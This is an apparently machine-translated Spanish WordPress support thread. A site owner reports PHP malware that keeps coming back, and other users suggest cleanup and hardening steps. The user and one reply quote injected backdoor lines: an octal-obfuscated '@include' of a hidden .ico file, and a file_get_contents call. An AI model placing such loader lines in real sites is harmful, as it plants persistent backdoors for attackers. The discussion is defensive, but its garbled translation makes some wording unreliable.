Pregunta sobre Arreglando WordPress de Wordpress:

¿Malware en archivos .php y .php numerados?

Un usuario preguntó 👇

Buen día, tengo este lío de recuperación que nadie parece saber qué es y todo el malware / antivirus para wordpress no logra bloquear.

Situación. Estaba hospedando con un ataque y luego comenzó la «infección», finalmente, después de que no pudieron solucionarlo, asumí que se trataba de una corrupción entre sitios y pasé al hospedaje Fastcomet.

Larga historia corta.

Algunos dominios que tengo tienen archivos, después de haberlos borrado extensamente, vuelven a la vida, literalmente borré el 90% de los sitios web de dominios y cargué copias limpias de marcha 2019. Fue el único Una excepción es cpanel que migró y usó fastcomet to ninja y todos los demás limpiadores de virus y malware para arreglar todo lo que pueda.

En index.php esta basura es visible.

@incluye “ 057ho 155e / 150cm 162eu 065 / b 154an 143va 056co 155 / w 160-a 144mi 156 / i 155ag 145s / 05683 1425c 14270 056ic 157 ”;

/ * 01e78 * /

Entonces de alguna manera estos archivos numerados, sí, incluso debajo en directorios vacíos .066551a6.ico .10dac2e5.ico 4uvayita.php bjsconzw.php index.php pivyomcw.php etc…

¿Alguien sabe qué es esto y cómo solucionarlo, sin que algunas empresas de malware fraudulentas no lo solucionen al 100%? Algunos se encuentran y eliminan

La última seguridad de wordpress 5.2.2.3 wp, ninja y otros 30, individualmente o en conjunto, pueden evitar que todos los activos e inactivos regresen e infecten la carpeta de alojamiento raíz y algunos dominios.

Cualquier consejo sobre cómo solucionar este problema que realmente solo funciona es eliminar un cpanel completo e incluso entonces puede volver.

Gracias por la ayuda.

Este tema fue modificado hace 1 año, 3 meses por.

(@jnashhawkins)

Hace 1 año, 3 meses

Exportaría mis medios y contenido a través del menú de la barra de herramientas debajo del tablero …

Entonces quiero obtener una nueva cuenta de servidor con la que nunca me haya sentido cómodo.

Instale WordPress prístino desde su botón único o manualmente si no me gusta su botón único (aunque me gustan tanto Turnkey como Bitnami, no son lo mismo que una instalación normal de CPanel de un botón).

Abra el nuevo sitio vacío e instale los plugins de iThemes Security, WordFence, WordFence y Sucurii. Habilite WordFence e Ithemes ahora y luego instale el plugin Importar e Importar para todos sus archivos WXR, incluidos los medios. Si los archivos son demasiado grandes para el nuevo host, puede usar un ‘fragmento / divisor XML’ en ellos.

Ejecute la página de ‘actualización’ para asegurarse de que todo esté funcionando. Instale su tema anterior … ¡desde una nueva copia si puede!

Cambie su DNS por nuevos sitios si aún no lo ha hecho. Inicie sesión como administrador nuevamente y asegúrese de que WordFence e iThemes Security estén bien configurados y funcionando. Enciende Sucuri y déjalo correr un rato.

Sucuri recorrerá su sitio y le advertirá si encuentra algo. WordFence bloqueará a muchos de los hackers / usuarios problemáticos. IThemes se instalará y funcionará bien con WordFence. Puede desactivar Sucuri una vez que haya terminado de configurar y probar el sitio. Eso debería exponer cualquier virus o malware para entonces. IThemes hará un buen trabajo y si deja el plugin Sucuri desactivado pero instalado, puede ejecutarlo cuando crea que algo está sucediendo.

Consulte https://wordpress.org/support/article/hardening-wordpress/ siguiente y las contraseñas deben ser muy estrictas.

Preste especial atención a los usuarios que haya comprado durante el proceso de importación y considere una nueva cuenta de administrador que le quita todos los privilegios de suscriptor a su antiguo usuario administrador, que probablemente también sea el usuario número uno. Eso en ese momento y su WordFence frustrará muchos de los niños de la escritura.

Publica tus publicaciones solo con la nueva cuenta de administrador. En su lugar, utilice una cuenta de colaborador o editor.

Un paso final también sería poner su sitio en Cloudflare … Obtendrá uno de los mejores servicios de DNS en el negocio y su servidor de ‘origen’ real estará detrás de un proxy que crea un firewall de manera eficiente desde Internet. más cuando CloudFlare se hace cargo.

¿Y el asistente de WordFence? Simplemente siéntese allí a menos que realmente lo necesite porque la dirección IP de su cuenta de administrador está bloqueada. Cuando regrese, usará el asistente para desbloquear su cuenta de administración y arreglar las cosas. Entonces lo deshabilitarás de nuevo. Déjalo dormir … merecerá que lo guarden la primera vez que te necesite.

Esta respuesta fue modificada hace 1 año, 3 meses. Esta respuesta fue modificada hace 1 año, 3 meses.

(@ madrocker13)

Hace 1 año, 3 meses

Gracias. Una cosa que no hice de tu lista es CloudFlare. Usuarios que utilizan un apodo alternativo para publicar.

Activo y configurado correctamente a niveles casi extremos, incluido el escaneo local y remoto.

Seguridad Anti-Malware Security All In One WP y Web Malware Scanner Quttera Firewall Brute-Force Security Sucuri – Audit, Malware Scanner y WP Content Copy & No Click Right >> Ninja y los otros plugins un total de 30 plugins.

Él informará.

(@johndsds)

Hace 11 meses, 2 semanas

La siguiente línea decodifica: “/home/hcmreu5/blancva.com/wp-admin/images/.83b5cb70.ico”; y el archivo todavía parece existir. La codificación es texto sin formato y algunos caracteres se reemplazan por su octanaje equivalente. Puede decodificar el archivo aquí:
https://malwaredecoder.com/

Encontré malware similar en mi propio servidor. También debe buscar archivos con el nombre index.html.bak.bak que ha sido reemplazado por index.php que se hace eco del archivo .bak y contiene un archivo .ico.

@include “ 057var 057www 057htm 154 / ty 144nin 147er / 145n-s 166aer 055foe 144sel 057.8f 063402 0659.i 143o”;

/ * aaa83 * / macalla @file_get_contents (‘index.html.bak.bak’);

Para encontrar candidatos potenciales de index.php, busque index.php no ejecutable. Todos los archivos .php e .ico parecen tener 8 caracteres por defecto y .ico es pionero. para hacerlo invisible para ls normales.

El archivo .ico contiene código que no he podido decodificar, pero es un tipo de cadena codificada en URL, que se traducirá a código PHP.

Si tiene acceso a los registros de su servidor web, puede buscar archivos POST y 8 caracteres .php. El archivo index.php se usa con variables POST como? Nwhtu = evgqy.

(@johndsds)

Hace 11 meses, 2 semanas

Encontré que este escáner de malware PHP funciona bien.
https://github.com/scr34m/php-malware-scanner
Usé scan -e .php -k -d / var / www / html y encontré la mayoría de las páginas php infectadas.

Descubrí que mi index.php principal para mi instalación de WordPress estaba infectado con código PHP con muchas direcciones IP. Supongo que estas direcciones se utilizan en el informe de devolución de que el sitio todavía está listo y listo para infectarse aún más.

¿Solucionó tu problema??

0 / 0

Deja una respuesta 0

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *